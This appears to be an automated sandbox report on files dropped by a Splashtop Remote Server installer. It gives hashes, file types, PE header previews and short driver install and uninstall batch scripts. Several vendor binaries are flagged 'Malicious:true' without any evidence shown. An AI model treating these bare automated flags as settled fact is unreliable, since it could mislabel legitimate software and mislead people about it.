                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:1zCCrWvSRU7VEBmGDnw29Gz07X83JlcytyCpw:1zCCrM7Uio83JljtyIw
                                                                                                                                                                                                                                                                                                                                  MD5:50F6A9509729A6D8D97E29AD259C6A1E
                                                                                                                                                                                                                                                                                                                                  SHA1:1AEADFC64CD4D6B9D878F93999A4D571936CCA91
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8B3049C278B7E3FE2CFE4D84096A292CC14557EBCC02B8998EB14C83289EB8F
                                                                                                                                                                                                                                                                                                                                  SHA-512:71660BEE4D58074B05538DA18F905CBFAF1567C60AA02F7C979571F3D21AC2AD56F19B3B7FEB2430686302222932CB901B0B895C16076EF1963CC93C94311769
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p..p..p......p......p.n....p..p."p......p......p......p.Rich.p.................PE..L.....H.....................`.......<............@..........................p......z_..........................................x....`..4...............................................................@............................................text............................... ..`.rdata...0.......@..................@..@.data...d3... ....... ..............@....rsrc...4....`.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\uninstall.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.932556842608647
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kCdgk3hdyE23B1047V1j47V1u47jkgAq3Gn3C:/jR8XRC4R94RQ43Aqqy
                                                                                                                                                                                                                                                                                                                                  MD5:00A98380A84308DFEDB409827DB9C916
                                                                                                                                                                                                                                                                                                                                  SHA1:F31EC578108616125450187C709B6E133425BC25
                                                                                                                                                                                                                                                                                                                                  SHA-256:948C84A52F8847798150629B396E29857C0C7EB77550276A000E02B2B9C85A4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:73AFAEB0394B470102A05D6E7F1195E60BEFE5469241C5ED182032AC80E54196945E7E9AA9AC2391DC13528E06F3D6C165C4083ECFE6B6F07A1E8F2E30AA5A8E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\devcon.exe remove mv_hook_display_driver2 >> inst.log....\utils\devcon.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End....\utils\DIFxCmd.exe /u driver\mv2.inf >> inst.log..:End....sc stop mv2 >> inst.log..sc delete mv2 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\64bits\stdpms.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28904
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117643529522381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:e+YCxM04ZZNXkvT4cTMUBZ17XM/Q3HUL+drIKumXOs:eULtXFULWfZ
                                                                                                                                                                                                                                                                                                                                  MD5:87FC012C1B45E780B6CFF6C4F1677C3B
                                                                                                                                                                                                                                                                                                                                  SHA1:C8EDB2EA85AE5EC17232F6E4CC5594AFB4805936
                                                                                                                                                                                                                                                                                                                                  SHA-256:D09E57690C0E9D6FF7EF26C7DD85F2E6D19C8E7B36CC298AEBAE04B16D59CA45
                                                                                                                                                                                                                                                                                                                                  SHA-512:9CD0590444B5FC79CDCD98196D43B027FA17091B49C5246CF9AE97128131BE851D7547BFB5896A2400045CE38901D74A61AEE2DE7D833B178CBDC6EFCC30CBAA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sk..7...7...7...>rn.0...7.......>rz.4...>r|.4...>rj.3...>r`.6...>r}.6...>rx.6...Rich7...........................PE..d...@.@R.........."......8......................................................................................................................(.......8....P..X....T..........(....1...............................................0...............................text...F........................... ..hNONPAGED..... ...................... ..h.rdata.......0......................@..H.data........@....... ..............@....pdata..X....P.......$..............@..HPAGE....G....`.......(.............. ..`INIT.................D.............. ....rsrc...8............L..............@..B.reloc..t............R..............@..B........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2470977727549695
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dYV0K8G6Pm/mec99KfRFQi64hA3C:kid40K8GteerfUibA3C
                                                                                                                                                                                                                                                                                                                                  MD5:1E14B5A16092F96F382E7CC1291A2B8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5CBD16AE4C6570AF42D6DC61C64AC2660FD88F60
                                                                                                                                                                                                                                                                                                                                  SHA-256:D547136F9EDF4066EF4E59864EED1D45EEBAE7FBB338F0068C925B6E6212A0CE
                                                                                                                                                                                                                                                                                                                                  SHA-512:1B5222F0F87C6C4A651868DFF84A7BB69A3C913257F0665DD955AF411AD9FC7D19AA1242F362BA676474CCEDDAC51D2B3A1AAEBA11BAEFEF899C6D5C0F083509
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe update stdpms.inf *PNP09FF >> inst.log..reg add "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /f /v "BlankScreenType" /t REG_DWORD /d 2 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):207
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.345831283284553
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dRLw0K8G6Pm/MWyec99KfRFQi64hA3C:kidm0K8GtfyerfUibA3C
                                                                                                                                                                                                                                                                                                                                  MD5:0270238B2339619D2CC54585124D1ED3
                                                                                                                                                                                                                                                                                                                                  SHA1:657F624CD74BADB8CB0186731FEDA17A997AD929
                                                                                                                                                                                                                                                                                                                                  SHA-256:01D2B51A0E18924936C30611457CAD5C5CC2A803C4CFD45E0850A92F6C55B6D7
                                                                                                                                                                                                                                                                                                                                  SHA-512:52A05F90023926CE9274C64CDE925C2C6055439201AF932459D4FED3D823D08164C76695FFEBA1763C4F9D76D52AAB2F86E230603E3DC2FB7664256E1856CFF8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe update stdpms.inf *PNP09FF >> inst.log..reg add "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /f /v "BlankScreenType" /t REG_DWORD /d 2 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\stdpms.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8925
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.166871854157093
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:dBsB42FHECwUnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lfr9mlv4:kB4UwUnYPL/p1P6j7Tmu
                                                                                                                                                                                                                                                                                                                                  MD5:38BEB031E625E814CFA8F84CEEE2B8FF
                                                                                                                                                                                                                                                                                                                                  SHA1:103C875EE0378BA5375A34E731FB2AFFC07939E1
                                                                                                                                                                                                                                                                                                                                  SHA-256:D441726A3E82AF0DF1C60EDD17B753E59827789BC50E3E79FE957319085F9091
                                                                                                                                                                                                                                                                                                                                  SHA-512:45DAD2545DB7B3A43DA22FB04518320BFE7E601AF053866253A52F887EE7C8919587AB11C448D335758BEFE2633D3D176B022F2E29D2B920F6164A6101F7CC41
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0."...*.H........".0."....1.0...+......0..j..+.....7.....[0..W0...+.....7.......L.L..O..Jm. Ym..130924010058Z0...+.....7.....0..S0....R3.7.4.F.E.D.7.A.4.4.6.6.9.F.1.A.C.7.B.0.7.2.B.0.C.7.1.8.5.5.F.5.B.6.B.0.3.5.C.8...1..m08..+.....7...1*0(...F.i.l.e........s.t.d.p.m.s...s.y.s...0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+........7O.zDf...r...U...5.0....R7.C.8.2.3.8.E.F.3.2.B.A.3.9.C.D.9.C.9.4.D.D.0.5.4.5.0.A.7.D.E.0.E.D.E.1.4.5.D.4...1..e08..+.....7...1*0(...F.i.l.e........s.t.d.p.m.s...i.n.f...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+........|.8.2.9....E.}...E.0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\stdpms.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1897
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.40875279355006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:jshokavrehezNkgyfROQ9gHwuMgHPgHh2v6YgFR:jMokCcakgMgyIMsAegn
                                                                                                                                                                                                                                                                                                                                  MD5:A68830A694AB983F0CBF2CC735A535E8
                                                                                                                                                                                                                                                                                                                                  SHA1:7C8238EF32BA39CD9C94DD05450A7DE0EDE145D4
                                                                                                                                                                                                                                                                                                                                  SHA-256:6F5CA12FFDFF830B32F02AF03C7B385819CC07BB51AC72A20D69B9C51B2E4112
                                                                                                                                                                                                                                                                                                                                  SHA-512:581478C5A9488227D0C56E34B7AE353C3FA7068D84023AEC14390B31D24B65BED82FD39590C5A7C4875AD25DEF17FC67ACC97C327D4282AD1E11DD9C260A714C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$WINDOWS NT$"..Class=Monitor..ClassGUID={4d36e96e-e325-11ce-bfc1-08002be10318}..Provider=%splashtop%..DriverVer=06/19/2013,1.0.0.1..CatalogFile=stdpms.cat....[SourceDisksFiles]..stdpms.sys = 99....[SourceDisksNames]..99 = %DISK_NAME%,,,""....[SourceDisksNames.AMD64]..99 = %DISK_NAME%,,,64bits....[DestinationDirs]..DefaultDestDir = 10..CopyFunctionDriver = 12....[Manufacturer]..%splashtop% = Vendor, NTx86, NTAMD64....[Vendor.NTx86]..%splashtop.DeviceDesc%=stdpms.Inst, *PNP09FF....[Vendor.NTAMD64]..%splashtop.DeviceDesc%=stdpms.Inst, *PNP09FF....[stdpms.Inst]..CopyFiles=CopyFunctionDriver..AddReg=stdpms.AddReg....[stdpms.AddReg]..HKR,,DevLoader,,*ntkern..HKR,,NTMPDriver,,stdpms.sys..HKR,,Description,,%splashtop.DeviceDesc%....[stdpms.Inst.NT]..CopyFiles=CopyFunctionDriver....[stdpms.Inst.NT.Services]..Addservice = stdpms, 0x00000002, stdpms_Service_Inst....[CopyFunctionDriver]..stdpms.sys,,,2....[stdpms_Service_Inst]..DisplayName = %splashtop.SvcDesc%..ServiceTyp

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\stdpms.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.296320987470735
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:G7yGlvIydpSkgTyLAykFsAZNOhFB8LHFnYPL/p1P6j7rflo:KyGlvIydQkgTgQFJjrFumXflo
                                                                                                                                                                                                                                                                                                                                  MD5:F44EC7AB90115F60EE5C89C40326E637
                                                                                                                                                                                                                                                                                                                                  SHA1:01BEC4EA8173F191321300587142A6E750728854
                                                                                                                                                                                                                                                                                                                                  SHA-256:C870FAFAD5C6DB27954C0440D9EFDDCE7B9C61D754EF0E77ABF18EFA1055DD90
                                                                                                                                                                                                                                                                                                                                  SHA-512:17FD122441EB1B2DBEAD9D79E0B8DB2CB0D581B930DF140069BD77440AA4F9BF4DB80784F261F57253CF3351546817238AAC81B2D68DA74884C46D514C9A9EDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................fd......ft......fc......ff.....Rich....................PE..L...>.@R.................*...........p.......0..............................................................................p..(.......8............>...............0...............................................0...............................text...l........................... ..hNONPAGED..... ...................... ..h.rdata.......0......................@..H.data........@......................@...PAGE.........P...................... ..`INIT.........p.......,.............. ....rsrc...8............4..............@..B.reloc..|............:..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.13651514908582
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kWgfeVKfDFGjdCi4eGjdyE23B1047V1j47V1u477lLWNi:ZoDowvei8XRC4R94RQ4h9
                                                                                                                                                                                                                                                                                                                                  MD5:F42F2B0F25E41755569A7775A5C6F8BA
                                                                                                                                                                                                                                                                                                                                  SHA1:B630C60A3375309731B0B7AC33A9D6E12B44ED50
                                                                                                                                                                                                                                                                                                                                  SHA-256:F026A21D6037169A81AC862A79E4F47C674B34914C1DED36BCDDB8739C838F46
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D9B9335D4767ACFCF651DB62B2B710CC9ECB402980D6A98982A1EA1C0A6F64FBA9762F2A44673CFE5749EE742F5FE68031FCFF968B4B4D2A290E74A0192375B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..reg delete "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /v "BlankScreenType" /f >> inst.log..utils\devcon.exe /r remove *PNP09FF >> inst.log..utils\devcon.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End..utils\DIFxCmd.exe /u stdpms.inf >> inst.log..:End

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):447
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.223602249135668
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kWgMyeVKfDFGjdd4eGjd0E23B1047V1j47V1u477DLWNi:Z3EDoQeiqXRC4R94RQ4P9
                                                                                                                                                                                                                                                                                                                                  MD5:3ADA65DC27A4580E1CF3FDC58A4A8C79
                                                                                                                                                                                                                                                                                                                                  SHA1:C1D8A0723FE1C586CEA434297CEF96E4E25C847D
                                                                                                                                                                                                                                                                                                                                  SHA-256:21D46DA2DC3808664C0D6028271BE0EEAB25DEFE60653E481238EEE96273E609
                                                                                                                                                                                                                                                                                                                                  SHA-512:B55E5E2CD2C1E48C526DEA70C075810F019942A72C2B0BBEF31E2DC8337B104ED5EB199AD6F0D8A16C6DFF3353193E647011A3E80762E47C9E7C13C6FCD4DBB4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..reg delete "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /v "BlankScreenType" /f >> inst.log..utils\devcon64.exe /r remove *PNP09FF >> inst.log..utils\devcon64.exe rescan >> inst.log..ver | find /i "5.1." > nul..if %errorlevel%==0 GOTO End..ver | find /i "5.2." > nul..if %errorlevel%==0 GOTO End..ver | find /i "6.0." > nul..if %errorlevel%==0 GOTO End..utils\DIFxCmd64.exe /u stdpms.inf >> inst.log..:End

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\XDColMan.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):207184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.508603224700573
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:SJzsVxRROApObap+CPSxzqNJ3pvfsFMV2+/SRVDB:SEOb5x2NxqFMi
                                                                                                                                                                                                                                                                                                                                  MD5:BDF578CA45021464EB4C5F2725FADE13
                                                                                                                                                                                                                                                                                                                                  SHA1:17FD8DD28EBE232EDB4A7D5B4A9734D6F48212F3
                                                                                                                                                                                                                                                                                                                                  SHA-256:F9711EC83463C8D7D8D3C2E0493BBDD9C55D55869AD49E327CC1F0612A836B51
                                                                                                                                                                                                                                                                                                                                  SHA-512:611999852027F5E52A786F4C22A77AF75EE3ECB1584AC1F061100248D19AA1C45C31665A38A46604B1D489A049D3CE00EF43DA7A5E427A3A7C1A5EFA0D874526
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
